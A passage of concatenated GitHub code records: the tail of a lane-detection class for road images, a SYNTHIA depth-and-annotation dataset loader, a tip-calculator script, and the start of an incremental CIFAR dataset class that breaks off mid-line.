binary_warped.nonzero()\n\t\tnonzeroy = np.array(nonzero[0])\n\t\tnonzerox = np.array(nonzero[1])\n\t\tmargin = 100\n\t\tleft_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy +\n\t\tleft_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) +\n\t\tleft_fit[1]*nonzeroy + left_fit[2] + margin)))\n\n\t\tright_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy +\n\t\tright_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) +\n\t\tright_fit[1]*nonzeroy + right_fit[2] + margin)))\n\n\t\tleftx = nonzerox[left_lane_inds]\n\t\tlefty = nonzeroy[left_lane_inds]\n\t\trightx = nonzerox[right_lane_inds]\n\t\trighty = nonzeroy[right_lane_inds]\n\t\tleft_fit = np.polyfit(lefty, leftx, 2)\n\t\tright_fit = np.polyfit(righty, rightx, 2)\n\t\tploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])\n\t\tleft_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n\t\tright_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n\t\t# visualize\n\n\t\tout_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n\t\twindow_img = np.zeros_like(out_img)\n\t\tout_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n\t\tout_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n\t\tleft_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])\n\t\tleft_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,\n\t\t\t\t\t\t\t\t\t ploty])))])\n\t\tleft_line_pts = np.hstack((left_line_window1, left_line_window2))\n\t\tright_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])\n\t\tright_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin, ploty])))])\n\t\tright_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n\t\tcv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n\t\tcv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n\t\tresult = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n\t\tret = {}\n\t\tret['leftx'] = leftx\n\t\tret['rightx'] = rightx\n\t\tret['left_fitx'] = left_fitx\n\t\tret['right_fitx'] = right_fitx\n\t\tret['ploty'] = ploty\n\n\t\treturn ret\n\n\n\tdef measure_lane_curvature(self, ploty, leftx, rightx, center_fit):\n\n\t\tleftx = leftx[::-1]\n\t\trightx = rightx[::-1]\n\t\ty_eval = np.max(ploty)\n\n\t\tif center_fit[0] < -0.0001:\n\t\t\tcurve_direction = 'Left Curve'\n\t\telif center_fit[0] > 0.0001:\n\t\t\tcurve_direction = 'Right Curve'\n\t\telse:\n\t\t\tcurve_direction = 'Straight'\n\n\t\treturn None, curve_direction\n\n\n\tdef draw_lane_lines(self, original_image, warped_image, Minv, draw_info, \n\t\tpoints_y_left, points_x_left, points_y_right, points_x_right, points_y_center, points_x_center):\n\n\t\tleftx = draw_info['leftx']\n\t\trightx = draw_info['rightx']\n\t\tleft_fitx = draw_info['left_fitx']\n\t\tright_fitx = draw_info['right_fitx']\n\t\tploty = draw_info['ploty']\n\n\t\twarp_zero = np.zeros_like(warped_image).astype(np.uint8)\n\t\tcolor_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n\t\tpts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n\t\tpts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n\t\tpts = np.hstack((pts_left, pts_right))\n\n\t\tmean_x = np.mean((left_fitx, right_fitx), axis=0)\n\t\tpts_mean = np.array([np.flipud(np.transpose(np.vstack([mean_x, ploty])))])\n\n\t\tcv2.fillPoly(color_warp, np.int_([pts]), (255, 255, 255))\n\n\t\tpoints = np.array(list(zip(points_x_left, points_y_left))).astype(int)\n\t\tcolor_warp = cv2.polylines(color_warp, [points], False, (255, 0, 0), 15) \n\n\t\tpoints = np.array(list(zip(points_x_right, points_y_right))).astype(int)\n\t\tcolor_warp = cv2.polylines(color_warp, [points], False, (255, 0, 0), 15) \n\n\t\tpoints = np.array(list(zip(points_x_center, points_y_center))).astype(int)\n\t\tcolor_warp = cv2.polylines(color_warp, [points], False, (255, 0, 0), 10) \n\n\t\tnewwarp = cv2.warpPerspective(color_warp, Minv, (original_image.shape[1], original_image.shape[0]))\n\t\tresult = cv2.addWeighted(original_image, 1, newwarp, 0.3, 0)\n\n\t\treturn pts_mean, result\n\n\n\tdef offCenter(self, meanPts, inpFrame):\n\n\t\tmpts = meanPts[-1][-1][-2].astype(int)\n\t\tpixelDeviation = inpFrame.shape[1] / 2 - abs(mpts)\n\t\tdeviation = pixelDeviation * self.XM_PER_PIX\n\t\tdirection = \"left\" if deviation < 0 else \"right\"\n\n\t\treturn deviation, direction\n\n\n\tdef addText(self, img, radius, direction, deviation, devDirection):\n\n\t\timg1 = np.copy(img)\n\n\t\tif direction == 'Straight':\n\t\t\tstart_point = (1280 // 2, 100)\n\t\t\tend_point = (1280 // 2, 100 - 25)\n\t\t\tcolor = (255, 0, 0) \n\t\t\tthickness = 7\n\t\t\timg1 = cv2.arrowedLine(img1, start_point, end_point, color, thickness, tipLength = 0.4)\n\t\telif direction == 'Left Curve':\n\t\t\tstart_point = (1280 // 2, 100)\n\t\t\tend_point = (1280 // 2 - 25, 100 - 25)\n\t\t\tcolor = (255, 0, 0) \n\t\t\tthickness = 7\n\t\t\timg1 = cv2.arrowedLine(img1, start_point, end_point, color, thickness, tipLength = 0.4)\n\t\telif direction == 'Right Curve':\n\t\t\tstart_point = (1280 // 2, 100)\n\t\t\tend_point = (1280 // 2 + 25, 100 - 25)\n\t\t\tcolor = (255, 0, 0) \n\t\t\tthickness = 7\n\t\t\timg1 = cv2.arrowedLine(img1, start_point, end_point, color, thickness, tipLength = 0.4)\n\n\t\timg = cv2.addWeighted(img, 0.7, img1, 0.3, 0)\n\n\t\tdeviation_text = 'Deviation: ' + str(round(abs(deviation), 3)) + 'm ' + devDirection\n\t\tcv2.putText(img, deviation_text, (450, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 1, cv2.LINE_AA)\n\n\t\treturn img\n\n \n\tdef process(self, frame):\n\n\t\t# find lines\n\n\t\tseg = self.segment(frame)\n\t\tbirdView, _, _, minverse = self.perspectiveWarp(seg)\n\t\thist, _, _ = self.plotHistogram(birdView)\n\t\tploty, left_fit, right_fit, center_fit, left_fitx, right_fitx, center_fitx = self.slide_window_search(birdView, hist)\n\t\tdraw_info = self.general_search(birdView, left_fit, right_fit)\n\n\t\t# smoothen\n\n\t\tif len(self.left_fit_list):\n\t\t\tleft_fit = 0.5 * left_fit + 0.5 * self.left_fit_list[-1]\n\t\tif len(self.right_fit_list):\n\t\t\tright_fit = 0.5 * right_fit + 0.5 * self.right_fit_list[-1]\n\t\tif len(self.center_fit_list):\n\t\t\tcenter_fit = 0.5 * center_fit + 0.5 * self.center_fit_list[-1]\n\n\t\tif len(self.left_fit_list) and np.linalg.norm(left_fit - self.left_fit_list[-1]) > 150:\n\t\t\tleft_fit = self.left_fit_list[-1]\n\t\t\tleft_fitx = self.left_fitx_list[-1]\n\t\tself.left_fit_list.append(left_fit)\n\t\tself.left_fitx_list.append(left_fitx)\n\n\t\tif len(self.lright_fit_list) and np.linalg.norm(right_fit - self.right_fit_list[-1]) > 150:\n\t\t\tright_fit = right_fit_list[-1]\n\t\t\tright_fitx = right_fitx_list[-1]\n\t\tself.right_fit_list.append(right_fit)\n\t\tself.right_fitx_list.append(right_fitx)\n\n\t\tif len(self.center_fit_list) and np.linalg.norm(center_fit - self.center_fit_list[-1]) > 150:\n\t\t\tcenter_fit = self.center_fit_list[-1]\n\t\t\tcenter_fitx = self.center_fitx_list[-1]\n\t\tself.center_fit_list.append(center_fit)\n\t\tself.center_fitx_list.append(center_fitx)\n\n\t\t# calculate characteristics\n\n\t\tcurveRad, curveDir = self.measure_lane_curvature(ploty, left_fitx, right_fitx, center_fit)\n\t\tmeanPts, result = self.draw_lane_lines(frame, birdView, minverse, draw_info, \n\t\t\tploty, left_fitx, ploty, right_fitx, ploty, center_fitx)\n\n\t\tdeviation, directionDev = self.offCenter(meanPts, frame)\n\t\tframe = self.addText(result, curveRad, curveDir, deviation, directionDev)\n\n\t\treturn frame\n","repo_name":"MikhailKitikov/DrivingMonitor","sub_path":"road situation analysis/research/road/lane detection/lane_detection.py","file_name":"lane_detection.py","file_ext":"py","file_size_in_byte":11751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6132824775","text":"import concurrent.futures as futures\nimport io\nimport os\nfrom pathlib import Path\nimport pickle\nimport tqdm\nfrom PIL import Image\nimport fire\nimport skimage\n\nimport numpy as np\n\nfrom second.core import box_np_ops\nfrom second.core import camera_transforms as cam_transforms\n\n\nclass SynthiaVideoDataset:\n def __init__(self, split, cam=False, colored_pc=False):\n \"\"\"\n Format of video_infos: [(vid, video_info)] where video_info = [{frame_info}]\n \"\"\"\n video_infos_path = Path(os.environ[\"DATADIR\"]) / \"synthia\" / f\"synthia_video_infos_{split}.pkl\"\n with open(video_infos_path, 'rb') as f:\n self.video_infos = pickle.load(f)\n\n self.cam = cam\n self.colored_pc = colored_pc\n\n def __len__(self):\n return len(self.video_infos)\n\n def __getitem__(self, idx):\n vid, video_info = self.video_infos[idx]\n video = Video(vid, video_info, self.cam, self.colored_pc)\n return video\n\n\n########################################################################################################################\n#region: Video class\n########################################################################################################################\nclass Video:\n def __init__(self, vid, video_info, cam=False, colored_pc=False):\n \"\"\"\n Args:\n vid: (int) video id\n video_info: [{frame_info}], frame_info dictionary for every frame\n cam: (bool) whether to load camera image\n colored_pc: (bool) whether to colorize point cloud\n \"\"\"\n self.vid = vid\n self.video_info = video_info\n self.cam = cam\n self.colored_pc = colored_pc\n self._MAX_DEPTH = 80.0 # only consider points within this depth\n \n def __len__(self):\n return len(self.video_info)\n \n def __getitem__(self, idx):\n \"\"\"\n Args:\n idx: (int) this is the index of the frame, from 0 to len(Video) - 1\n \"\"\"\n frame_info = self.video_info[idx] # frame info\n root_path = Path(os.environ[\"DATADIR\"]) / \"synthia\"\n\n res = {\n \"depth\": None, # np.ndarray, dtype=np.float32, shape=(H, W)\n \"points\": None,\n \"cam\": {\n \"image_str\": None, # str, image string\n \"datatype\": None, # str, suffix type\n },\n \"metadata\": {\n \"frameid\": frame_info[\"frameid\"],\n \"image_shape\": frame_info[\"image\"][\"image_shape\"]\n },\n \"calib\": frame_info[\"calib\"],\n \"annos\": None\n }\n\n # --------------------------------------------------------------------------------------------------------------\n # depth\n # --------------------------------------------------------------------------------------------------------------\n depth_path = Path(frame_info[\"depth\"][\"depth_path\"])\n if not depth_path.is_absolute():\n depth_path = root_path / depth_path\n # synthia depth formula: \"Depth = 5000 * (R + G*256 + B*256*256) / (256*256*256 - 1)\"\n np_depth_image = np.array(Image.open(depth_path)) # (H, W, 4) dtype=np.uint8\n R, G, B = [np_depth_image[:, :, e].astype(np.int64) for e in range(3)] # (H, W), dtype=np.int64\n np_depth_image = 5000 * (R + G*256 + B*256*256) / (256*256*256 - 1) # (H, W) dtype=np.float64\n np_depth_image = np_depth_image.astype(np.float32) # (H, W) dtype=np.float32\n res[\"depth\"] = np_depth_image\n\n # --------------------------------------------------------------------------------------------------------------\n # cam\n # --------------------------------------------------------------------------------------------------------------\n if self.cam or self.colored_pc:\n image_path = Path(frame_info['image']['image_path'])\n if not image_path.is_absolute():\n image_path = root_path / image_path\n with open(str(image_path), 'rb') as f:\n image_str = f.read()\n res[\"cam\"][\"image_str\"] = image_str\n res[\"cam\"][\"datatype\"] = image_path.suffix[1:]\n \n # --------------------------------------------------------------------------------------------------------------\n # points\n # --------------------------------------------------------------------------------------------------------------\n np_depth_image = np_depth_image[..., np.newaxis] # (H, W, 1)\n if self.colored_pc:\n # concatenate depth map with colors\n np_rgb_image = np.array(Image.open(io.BytesIO(image_str))) # (H, W, 4)\n np_rgb_image = np_rgb_image[:, :, :3] # (H, W, 3)\n np_depth_image = np.concatenate([np_depth_image, np_rgb_image], axis=2) # (H, W, 4)\n\n # points in cam frame\n P2 = frame_info['calib']['P2'] # intrinsics matrix\n if P2.shape == (4, 4):\n P2 = P2[:3, :3]\n else:\n assert P2.shape == (3, 3)\n points = cam_transforms.depth_map_to_point_cloud(np_depth_image, P2) # (N, 3) or (N, 6)\n \n # points in velo frame\n Tr_velo_to_cam = frame_info['calib']['Tr_velo_to_cam'] # extrinsics matrix\n Tr_cam_to_velo = np.linalg.inv(Tr_velo_to_cam)\n xyz1_cam = np.hstack((points[:, :3], np.ones([len(points), 1], dtype=points.dtype))) # (N, 4)\n xyz1_velo = xyz1_cam @ Tr_cam_to_velo.T # (N, 4)\n points = np.hstack((xyz1_velo[:, :3], points[:, 3:])) # (N, 3) or (N, 6)\n\n # points within MAX_DEPTH\n points = points[points[:, 0] < self._MAX_DEPTH, :] # (M, 3) or (M, 6)\n res[\"points\"] = points\n\n # --------------------------------------------------------------------------------------------------------------\n # annos\n # --------------------------------------------------------------------------------------------------------------\n annos = frame_info['annos']\n annos = self._remove_dontcare(annos)\n locs = annos[\"location\"]\n dims = annos[\"dimensions\"]\n rots = annos[\"rotation_y\"]\n gt_names = annos[\"name\"]\n gt_boxes = np.concatenate([locs, dims, rots[..., np.newaxis]], axis=1).astype(np.float32)\n gt_boxes = box_np_ops.box_camera_to_lidar(gt_boxes,\n r_rect=frame_info[\"calib\"][\"R0_rect\"],\n velo2cam=frame_info[\"calib\"][\"Tr_velo_to_cam\"]\n )\n # only center format is allowed. so we need to convert kitti [0.5, 0.5, 0] center to [0.5, 0.5, 0.5]\n box_np_ops.change_box3d_center_(gt_boxes, [0.5, 0.5, 0], [0.5, 0.5, 0.5])\n res[\"annos\"] = {\n 'names': gt_names,\n 'boxes': gt_boxes,\n 'boxes2d': annos[\"bbox\"]\n }\n\n return res\n \n def _remove_dontcare(self, annos):\n filtered_annos = {}\n relevant_annotation_indices = [i for i, x in enumerate(annos['name']) if x != \"DontCare\"]\n for key in annos.keys():\n filtered_annos[key] = (annos[key][relevant_annotation_indices])\n return filtered_annos\n\n#endregion\n########################################################################################################################\n#region: Functions to create videoset files (second/dynamic/SynthiaVideoSets) and load vid2metadata\n########################################################################################################################\n\ndef create_videoset_files():\n \"\"\"\n Each row in the vid2metadata file has the following columns:\n\n vid subdir frameids\n 0001 train/test5_10segs_weather...2018_12-47-37 000101 000102 ... 000280\n\n vid : video index (from 0 to TOTAL_VIDEOS_IN_SYNTHIA-1)\n subdir : synthia subdirectory\n frameids : index of the subdirectory. files are named using this index.\n \"\"\"\n root_path = Path(os.environ[\"DATADIR\"]) / \"synthia\"\n videosets_dir = Path(__file__).resolve().parent / \"SynthiaVideoSets\"\n\n metadata, trainvids, testvids = [], [], []\n\n train_dir = root_path / \"train\"\n test_dir = root_path / \"test\"\n for ttdir in [train_dir, test_dir]:\n for updir in sorted([e for e in ttdir.iterdir() if e.is_dir()]):\n for subdir in sorted([e for e in updir.iterdir() if e.is_dir()]):\n if not (subdir / \"labels_kitti\").is_dir():\n continue # empty data.\n frameids = []\n for imfile in sorted((subdir / \"labels_kitti\").iterdir()):\n # Load all frames in the scene, whether they contain a Car or not.\n frame_id = imfile.name.split('.')[0]\n frameids.append(frame_id)\n metadata.append((subdir, frameids))\n \n with open(videosets_dir / \"vid2metadata.txt\", 'w') as f:\n for vid, metadatum in enumerate(metadata):\n vid = str(vid).rjust(4, '0')\n subdir, frameids = metadatum\n subdir = str(subdir.relative_to(root_path))\n if subdir.startswith('train/'):\n trainvids.append(vid)\n else:\n testvids.append(vid)\n rowtext = ' '.join([vid, subdir] + frameids)\n print(rowtext, file=f)\n \n print(f'Synthia TRAIN: has {len(trainvids)} videos.')\n print(f'Synthia TEST : has {len(testvids)} videos.')\n\n np.random.seed(0)\n\n with open(videosets_dir / \"train.txt\", 'w') as f:\n for vid in np.random.permutation(trainvids):\n print(vid, file=f)\n \n with open(videosets_dir / \"test.txt\", 'w') as f:\n for vid in np.random.permutation(testvids):\n print(vid, file=f)\n\n\ndef load_vid2metadata():\n \"\"\"\n Format:\n {\n vid: { // metadata\n \"subdir\" : subdirectory\n \"frameids\": [list of frameids]\n }\n }\n\n vid: (int) video id\n subdirectory: (str) path to subdirectory\n frameids: list(int) list of frameids\n \"\"\"\n VID2METADATA = {}\n vid2metadata_file = Path(__file__).resolve().parent / \"SynthiaVideoSets\" / \"vid2metadata.txt\"\n with open(vid2metadata_file, 'r') as f:\n lines = [line.rstrip().split() for line in f.readlines()]\n for line in lines:\n vid, subdir, frameids = line[0], line[1], line[2:]\n VID2METADATA[vid] = {'subdir': subdir, 'frameids': frameids}\n return VID2METADATA\n\n#endregion\n########################################################################################################################\n#region: Functions to create video_infos pickle files in $DATASET/synthia\n########################################################################################################################\n\ndef get_file_path(subdir,\n frame_id,\n info_type='image_2',\n file_tail='.png',\n relative_path=True,\n exist_check=True):\n root_path = Path(os.environ[\"DATADIR\"]) / \"synthia\"\n rel_file_path = f\"{subdir}/{info_type}/{frame_id}{file_tail}\"\n abs_file_path = root_path / rel_file_path\n if exist_check and not abs_file_path.exists():\n raise ValueError(\"file not exist: {}\".format(abs_file_path))\n if relative_path:\n return str(rel_file_path)\n else:\n return str(abs_file_path)\n\ndef get_synthia_label_anno(label_path):\n annotations = {}\n annotations.update({\n 'name': [],\n 'truncated': [],\n 'occluded': [],\n 'alpha': [],\n 'bbox': [],\n 'dimensions': [],\n 'location': [],\n 'rotation_y': [],\n 'difficulty': []\n })\n with open(label_path, 'r') as f:\n lines = f.readlines()\n \n content = [line.strip().split(' ') for line in lines]\n num_objects = len([x[0] for x in content if x[0] != 'DontCare'])\n annotations['name'] = np.array([x[0] for x in content])\n num_gt = len(annotations['name'])\n annotations['truncated'] = np.array([float(x[1]) for x in content])\n annotations['occluded'] = np.array([int(x[2]) for x in content])\n annotations['alpha'] = np.array([float(x[3]) for x in content])\n annotations['bbox'] = np.array(\n [[float(info) for info in x[4:8]] for x in content]).reshape(-1, 4)\n # dimensions will convert hwl format to standard lhw(camera) format.\n annotations['dimensions'] = np.array(\n [[float(info) for info in x[8:11]] for x in content]).reshape(\n -1, 3)[:, [2, 0, 1]]\n annotations['location'] = np.array(\n [[float(info) for info in x[11:14]] for x in content]).reshape(-1, 3)\n annotations['rotation_y'] = np.array(\n [float(x[14]) for x in content]).reshape(-1)\n if len(content) != 0 and len(content[0]) == 16: # have score\n annotations['score'] = np.array([float(x[15]) for x in content])\n else:\n annotations['score'] = np.zeros((annotations['bbox'].shape[0], ))\n index = list(range(num_objects)) + [-1] * (num_gt - num_objects)\n annotations['index'] = np.array(index, dtype=np.int32)\n annotations['group_ids'] = np.arange(num_gt, dtype=np.int32)\n\n # Adding difficulty to annotations.\n min_height = [40, 25, 25] # minimum height for evaluated groundtruth/detections\n max_occlusion = [0, 1, 2] # maximum occlusion level of the groundtruth used for evaluation\n max_trunc = [0.15, 0.3, 0.5] # maximum truncation level of the groundtruth used for evaluation\n dims = annotations['dimensions'] # lhw format\n bbox = annotations['bbox']\n height = bbox[:, 3] - bbox[:, 1]\n occlusion = annotations['occluded']\n truncation = annotations['truncated']\n diff = []\n easy_mask = np.ones((len(dims), ), dtype=np.bool)\n moderate_mask = np.ones((len(dims), ), dtype=np.bool)\n hard_mask = np.ones((len(dims), ), dtype=np.bool)\n i = 0\n for h, o, t in zip(height, occlusion, truncation):\n if o > max_occlusion[0] or h <= min_height[0] or t > max_trunc[0]:\n easy_mask[i] = False\n if o > max_occlusion[1] or h <= min_height[1] or t > max_trunc[1]:\n moderate_mask[i] = False\n if o > max_occlusion[2] or h <= min_height[2] or t > max_trunc[2]:\n hard_mask[i] = False\n i += 1\n is_easy = easy_mask\n is_moderate = np.logical_xor(easy_mask, moderate_mask)\n is_hard = np.logical_xor(hard_mask, moderate_mask)\n\n for i in range(len(dims)):\n if is_easy[i]:\n diff.append(0)\n elif is_moderate[i]:\n diff.append(1)\n elif is_hard[i]:\n diff.append(2)\n else:\n diff.append(-1)\n annotations[\"difficulty\"] = np.array(diff, np.int32)\n\n return annotations\n\ndef _extend_matrix(mat):\n mat = np.concatenate([mat, np.array([[0., 0., 0., 1.]])], axis=0)\n return mat\n \ndef get_video_info(metadata,\n extend_matrix=True,\n num_worker=8,\n relative_path=True,\n with_imageshape=True):\n \"\"\" \n Args:\n metadata: {\n \"subdir\" : subdirectory\n \"frameids\": [list of frameids]\n }\n Returns:\n video_info: list(frame_info), frame_info dictionary for every frame\n \"\"\"\n subdir = metadata[\"subdir\"]\n frameids = metadata[\"frameids\"]\n root_path = Path(os.environ[\"DATADIR\"]) / \"synthia\"\n \n def get_frame_info(frameid):\n depth_path = get_file_path(subdir, frameid, 'Depth' , '.png', relative_path)\n image_path = get_file_path(subdir, frameid, 'RGB' , '.png', relative_path)\n label_path = get_file_path(subdir, frameid, 'labels_kitti', '.txt', relative_path)\n calib_path = get_file_path(subdir, frameid, 'calib_kitti' , '.txt', relative_path=False)\n\n frame_info = {\n 'frameid': frameid,\n 'image': {\n 'image_path': image_path,\n 'image_shape': None\n },\n 'depth': {\n 'depth_path': depth_path \n },\n 'annos': None,\n 'calib': {\n\n }\n }\n\n # image shape\n img_path = frame_info['image']['image_path']\n if relative_path:\n img_path = str(root_path / img_path)\n frame_info['image']['image_shape'] = np.array(skimage.io.imread(img_path).shape[:2], dtype=np.int32)\n \n # annos\n if relative_path:\n label_path = str(root_path / label_path)\n annotations = get_synthia_label_anno(label_path)\n frame_info['annos'] = annotations\n\n # calib\n with open(calib_path, 'r') as f:\n lines = f.readlines()\n P0 = np.array([float(info) for info in lines[0].split(' ')[1:13]]).reshape([3, 4])\n P1 = np.array([float(info) for info in lines[1].split(' ')[1:13]]).reshape([3, 4])\n P2 = np.array([float(info) for info in lines[2].split(' ')[1:13]]).reshape([3, 4])\n P3 = np.array([float(info) for info in lines[3].split(' ')[1:13]]).reshape([3, 4])\n if extend_matrix:\n P0 = _extend_matrix(P0)\n P1 = _extend_matrix(P1)\n P2 = _extend_matrix(P2)\n P3 = _extend_matrix(P3)\n R0_rect = np.array([float(info) for info in lines[4].split(' ')[1:10]]).reshape([3, 3])\n if extend_matrix:\n rect_4x4 = np.zeros([4, 4], dtype=R0_rect.dtype)\n rect_4x4[3, 3] = 1.\n rect_4x4[:3, :3] = R0_rect\n else:\n rect_4x4 = R0_rect\n\n Tr_velo_to_cam = np.array([[0, -1, 0, 0], # x <- -y\n [0, 0, -1, 0], # y <- -z\n [1, 0, 0, 0], # z <- +x\n [0, 0, 0, 1]], dtype=np.float32)\n frame_info[\"calib\"]['P0'] = P0\n frame_info[\"calib\"]['P1'] = P1\n frame_info[\"calib\"]['P2'] = P2\n frame_info[\"calib\"]['P3'] = P3\n frame_info[\"calib\"]['R0_rect'] = rect_4x4\n frame_info[\"calib\"]['Tr_velo_to_cam'] = Tr_velo_to_cam\n\n return frame_info\n\n with futures.ThreadPoolExecutor(num_worker) as executor:\n frame_infos = executor.map(get_frame_info, frameids)\n return list(frame_infos)\n\ndef create_video_infos_file(relative_path=True, split='train'):\n \"\"\"\n Format of video_infos: [(vid, video_info)] where video_info = [{frame_info}]\n \"\"\"\n VID2METADATA = load_vid2metadata()\n videoset_file = Path(__file__).resolve().parent / \"SynthiaVideoSets\" / f\"{split}.txt\"\n \n root_path = Path(os.environ[\"DATADIR\"]) / \"synthia\"\n video_infos_pkl_file = root_path / f'synthia_video_infos_{split}.pkl'\n\n with open(videoset_file, 'r') as f:\n vids = [line.rstrip() for line in f.readlines()]\n\n video_infos = []\n print(\"Generating video infos. This may take several minutes.\")\n for vid in tqdm.tqdm(vids):\n metadata = VID2METADATA[vid]\n video_info = get_video_info(metadata, relative_path=True)\n video_infos.append((vid, video_info))\n\n print(f\"Synthia video infos file is saved to {video_infos_pkl_file}\")\n with open(video_infos_pkl_file, 'wb') as f:\n pickle.dump(video_infos, f)\n\n#endregion\n########################################################################################################################\n\n\nif __name__ == \"__main__\":\n fire.Fire()\n","repo_name":"CMU-Light-Curtains/ObjectDetection","sub_path":"second/dynamic/data/synthia.py","file_name":"synthia.py","file_ext":"py","file_size_in_byte":19381,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"73648619685","text":"print(\"Welcome to the tip calculator\")\r\nbill_total = float(input(\"What was the total bill? \"))\r\nbill_percentage_tip = float(input(\"What percentage tip would you like to give? 10, 12 or 15? \"))\r\nsplit = float(input(\"How many people to split the bill? \"))\r\n\r\nfull_price = bill_total / 100\r\ntip = full_price * bill_percentage_tip + bill_total\r\ntotal = tip / split\r\nfinal_amount = round(total, 2)\r\nfinal_amount = \"{:.2f}\".format(total)\r\n\r\nprint(f\"Each person should pay ${final_amount}\")","repo_name":"lxMersin/learning-python","sub_path":"tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26229561742","text":"import logging\nimport random\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nimport sys\nsys.path.append(\"lib\\\\data\")\nfrom datasets import iCIFAR10, iCIFAR100\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass IncrementalDataset:\n \"\"\"Incremental generator of datasets.\n\n :param dataset_name: Among a list of available dataset, that can easily\n be defined (see at file's end).\n :param random_order: Shuffle the class ordering, else use a cherry-picked\n ordering.\n :param shuffle: Shuffle batch order between epochs.\n :param workers: Number of workers loading the data.\n :param batch_size: The batch size.\n :param seed: Seed to force determinist class ordering.\n :param increment: Number of class to add at each task.\n :param validation_split: Percent of training data to allocate for validation.\n :param onehot: Returns targets encoded as onehot vectors instead of scalars.\n Memory is expected to be already given in an onehot format.\n :param initial_increment: Initial increment may be defined if you want to train\n on more classes than usual for the first task, like\n UCIR does.\n \"\"\"\n\n def __init__(\n self,\n dataset_name,\n random_order=False,\n shuffle=True,\n workers=10,\n batch_size=128,\n seed=1,\n increment=10,\n validation_split=0.,\n onehot=False,\n initial_increment=None,\n sampler=None,\n sampler_config=None,\n data_path=\"data\",\n class_order=None,\n dataset_transforms=None,\n all_test_classes=False,\n metadata_path=None\n ):\n datasets = _get_datasets(dataset_name)\n print(datasets)\n dataset1 = datasets[0]\n\n self._setup_data(\n dataset1,\n random_order=random_order,\n class_order=class_order,\n seed=seed,\n increment=increment,\n validation_split=validation_split,\n initial_increment=initial_increment,\n data_path=data_path\n )\n dataset = datasets[0]()\n # self.dataset_p = dataset\n dataset.set_custom_transforms(dataset_transforms)\n self.train_transforms = dataset.train_transforms # FIXME handle multiple datasets\n self.test_transforms = dataset.test_transforms\n self.common_transforms = dataset.common_transforms\n\n self.open_image = datasets[0].open_image\n\n self._current_task = 0\n\n self._seed = seed\n self._batch_size = batch_size\n self._workers = workers\n self._shuffle = shuffle\n self._onehot = onehot\n self._sampler = sampler\n self._sampler_config = sampler_config\n self._all_test_classes = all_test_classes\n self.train_fine_nums_inc = 0\n self.train_coarse_nums_inc = []\n self.H = dataset.H\n @property\n def n_tasks(self):\n return len(self.increments)\n\n @property\n def n_classes(self):\n return sum(self.increments)\n\n def new_task(self, memory=None, memory_val=None):\n if self._current_task >= len(self.increments):\n raise Exception(\"No more tasks.\")\n\n min_class = sum(self.increments[:self._current_task])\n max_class = sum(self.increments[:self._current_task + 1])\n\n x_train, y_train_fine, y_train_coarse = self._select(\n self.data_train, self.fine_targets_train, self.coarse_targets_train, low_range=min_class, high_range=max_class\n )\n self.train_fine_nums_inc, self.train_coarse_nums_inc = self.get_class_nums(y_train_fine, y_train_coarse)\n nb_new_classes = len(np.unique(y_train_fine))\n x_val, y_val_fine, y_val_coarse = self._select(\n self.data_val, self.fine_targets_val, self.coarse_targets_val, low_range=min_class,\n high_range=max_class\n )\n if self._all_test_classes is True:\n logger.info(\"Testing on all classes!\")\n x_test, y_test_fine, y_test_coarse = self._select(\n self.data_test, self.fine_targets_test, self.coarse_targets_test, high_range=sum(self.increments)\n )\n elif self._all_test_classes is not None or self._all_test_classes is not False:\n max_class = sum(self.increments[:self._current_task + 1 + self._all_test_classes])\n logger.info(\n f\"Testing on {self._all_test_classes} unseen tasks (max class = {max_class}).\"\n )\n x_test, y_test_fine, y_test_coarse = self._select(\n self.data_test, self.fine_targets_test, self.coarse_targets_test, high_range=max_class\n )\n else:\n x_test, y_test_fine, y_test_coarse = self._select(\n self.data_test, self.fine_targets_test, self.coarse_targets_test, high_range=max_class)\n\n if self._onehot:\n\n def to_onehot(x):\n n = np.max(x) + 1\n return np.eye(n)[x]\n\n y_train_fine = to_onehot(y_train_fine)\n y_train_coarse = to_onehot(y_train_coarse)\n if memory is not None:\n logger.info(\"Set memory of size: {}.\".format(memory[0].shape[0]))\n x_train, y_train_fine, y_train_coarse, train_memory_flags = self._add_memory(x_train, y_train_fine,\n y_train_coarse, *memory)\n else:\n train_memory_flags = np.zeros((x_train.shape[0],))\n if memory_val is not None:\n logger.info(\"Set validation memory of size: {}.\".format(memory_val[0].shape[0]))\n x_val, y_val_fine, y_val_coarse, val_memory_flags = self._add_memory(x_val, y_val_fine, y_val_coarse,\n *memory)\n else:\n val_memory_flags = np.zeros((x_val.shape[0],))\n train_loader = 